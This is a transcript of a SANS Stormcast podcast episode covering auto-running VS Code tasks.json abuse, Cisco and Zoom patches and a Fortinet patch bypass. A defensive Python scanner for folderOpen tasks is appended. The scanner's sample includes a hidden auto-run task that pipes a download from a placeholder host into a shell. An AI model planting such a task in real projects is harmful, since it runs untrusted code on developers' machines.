Hello and welcome to the Thursday, January 22nd, 2026
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich and today I'm recording from
Jacksonville, Florida. And this episode is brought to you
by the SANS.edu Bachelor's Degree Program in Applied
Cybersecurity.

In diaries today, we have Xavier, and we talk about the
automatic script execution in Visual Studio Code. Visual
Studio Code is a development environment. It's much more
than a simple editor, and like most of these IDEs, it has
the ability to execute code. One way this is done in
Visual Studio Code is by using a .vscode directory and,
inside that, a tasks.json file. What happens is, as Visual
Studio Code opens a file, it checks for this directory,
and the tasks.json file will then define certain actions
to execute on specific events, like in the example that
Xavier presents, whenever a new folder is opened. So an
attacker can easily smuggle code as part of some project
that they're offering, for example, for download and then
execute it inside the developer's editor. This is a
technique that has been used in several attacks, so
there's nothing really new. Similar stuff has been done
with Visual Studio Code extensions, for example. But I
think the most important lesson here is: whenever you
download source code and then open it in a complex
environment like Visual Studio Code, well, there is a
possibility that code is being executed, so you better
trust that code. Some development environments, like for
example the ones developed by JetBrains that are very
popular, will give you sort of a warning when you open a
file. It asks you, well, do you trust the file or not,
which will then trigger this behavior or keep it just in
sort of a normal editor mode where it doesn't execute any
code. Either way, whenever you edit code, make sure that
you trust the code, and you may want to check for any
mechanisms like this, like these tasks.json files for
Visual Studio Code, but they look slightly different for
every development environment.

And Cisco released several
patches today. The most noteworthy one is a critical
vulnerability in the Cisco Unified Communications
product. There's an entire sort of product family that is
sort of under this umbrella. They all suffer from this
vulnerability. It's rated critical; the CVSS score is a
little bit low, I think, for this vulnerability: a base
score of 8.2. The problem is that we have one of those
typical vulnerabilities where user input isn't properly
validated. It doesn't really state the exact nature of the
problem here, but it says that an unauthenticated attacker
could obtain user privileges and then later escalate them
to root. So basically it leads to a complete system
compromise, which is why I think this may deserve a higher
CVSS score. But it's not really clear if they're really
talking about the same vulnerability here or just two
different vulnerabilities chained together to get to
complete root access on the device. Either way, patch your
setups.

Then we have a critical vulnerability in Zoom
that has been patched. This one affects the Zoom Node
multimedia routers, so not sort of the Zoom desktop
product. But it's critical and sort of interesting also
because it does allow operative code execution. So
that's why it has a CVSS score of 9.9 and should be quickly
patched. In order to exploit the vulnerability, an
attacker has to be a participant of a Zoom meeting
that is using this Zoom Node multimedia router.

And Fortinet users are reporting that they're seeing successful
exploit attempts against Fortinet firewalls that are
perfectly patched, in particular patched against
CVE-2025-59718, a single sign-on vulnerability that was
patched back in December. And apparently what is going on
here is that a new variation of the exploit is able to
bypass the patch. I haven't seen any sort of official note
from Fortinet yet, but a user in the Fortinet Reddit
quoted communication with a Fortinet developer confirming
that the vulnerability really persists and is not really
fixed yet in 7.4.10, and there should soon be a 7.4.11
version coming out, as well as respective updates for 7.6
and 8.0. So keep looking out for that. In the meantime,
just sort of disabling the single sign-on feature works as
a workaround. That was the workaround that was also
recommended back when the vulnerability was originally
discovered and before it was patched in December.

And SANS
is asking for your help with the 10th annual SOC survey.
It's sort of one of the big surveys that SANS does every
year, and yes, now for 10 years in a row. So if you're
working in a SOC, or even if you're managing it, please
share your experience. This has been sort of one of the
bigger surveys that SANS does each year. It has been quite
helpful in the past. So please help us out here in just
answering a couple of questions.

Well, and that's it for today. So thanks for listening,
thanks for liking, and thanks for subscribing to this
podcast. And as always, talk to you again tomorrow. Bye.
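The .vscode/tasks.json mechanism discussed in the Visual Studio Code segment above, as an added example that is not part of the podcast or of Xavier's diary: a small Python scanner that parses a repository's tasks.json (VS Code accepts comments and trailing commas in it, so they are stripped first) and flags every task whose runOptions.runOn is set to folderOpen, the setting that makes VS Code start the task as soon as the folder is opened. The sample tasks.json, the task labels and the example.invalid URL are constructed for this example; the command in it is a placeholder, not an observed payload.

```python
"""Flag VS Code tasks that run automatically when a folder is opened.

Added example for the tasks.json mechanism discussed in the podcast;
not code from SANS ISC or from Xavier's diary. It looks for tasks whose
runOptions.runOn is "folderOpen" in a checkout's .vscode/tasks.json.
"""
import json
from pathlib import Path

# Constructed sample (not an observed file): one ordinary build task plus
# one task that auto-runs on folder open with its terminal hidden. The
# command and URL are placeholders chosen for this example.
SAMPLE_TASKS_JSON = r'''{
    // VS Code accepts comments and trailing commas in tasks.json
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "shell",
            "command": "make",
            "group": "build",
        },
        {
            "label": "Prepare workspace",
            "type": "shell",
            "command": "sh",
            "args": ["-c", "curl -s https://example.invalid/setup.sh | sh"],
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" }, /* keep the terminal hidden */
        },
    ],
}'''


def strip_jsonc(text: str) -> str:
    """Turn VS Code's JSON-with-comments into strict JSON.

    Removes // and /* */ comments that appear outside of strings (so a
    "https://..." inside a string survives) and drops trailing commas
    before } or ], which json.loads would otherwise reject.
    """
    out: list[str] = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped char, e.g. \"
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment: skip to newline
            end = text.find("\n", i)
            i = n if end == -1 else end
        elif text.startswith("/*", i):       # block comment: skip past */
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        elif c in "}]":
            # remove a dangling comma (and whitespace) right before the bracket
            k = len(out)
            while k > 0 and out[k - 1].isspace():
                k -= 1
            if k > 0 and out[k - 1] == ",":
                del out[k - 1]
            out.append(c)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def load_tasks_json(text: str) -> dict:
    """Parse a tasks.json (JSONC) document into a plain dict."""
    return json.loads(strip_jsonc(text))


def find_auto_run_tasks(tasks_json_text: str) -> list[dict]:
    """Return the tasks VS Code would start as soon as the folder is opened."""
    findings = []
    for task in load_tasks_json(tasks_json_text).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task.get("command", "")
        args = task.get("args", [])
        findings.append({
            "label": task.get("label"),
            "type": task.get("type"),        # "shell" runs through the user's shell
            "command": " ".join([str(cmd), *map(str, args)]).strip(),
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return findings


def scan_repo(root: str) -> list[dict]:
    """Walk a checkout and report folderOpen tasks in every .vscode/tasks.json."""
    report = []
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        for finding in find_auto_run_tasks(path.read_text(encoding="utf-8")):
            report.append({"file": str(path), **finding})
    return report


if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run task {f['label']!r} ({f['type']}): {f['command']}"
              + ("  [terminal hidden]" if f["hidden"] else ""))
```

Run scan_repo on a freshly cloned project before opening it in the editor. VS Code's Workspace Trust keeps tasks disabled while a folder is in Restricted Mode, so the useful moment for this check is before you click "Trust" on an unfamiliar project; note that a .code-workspace file can carry its own tasks section, which this scanner does not cover.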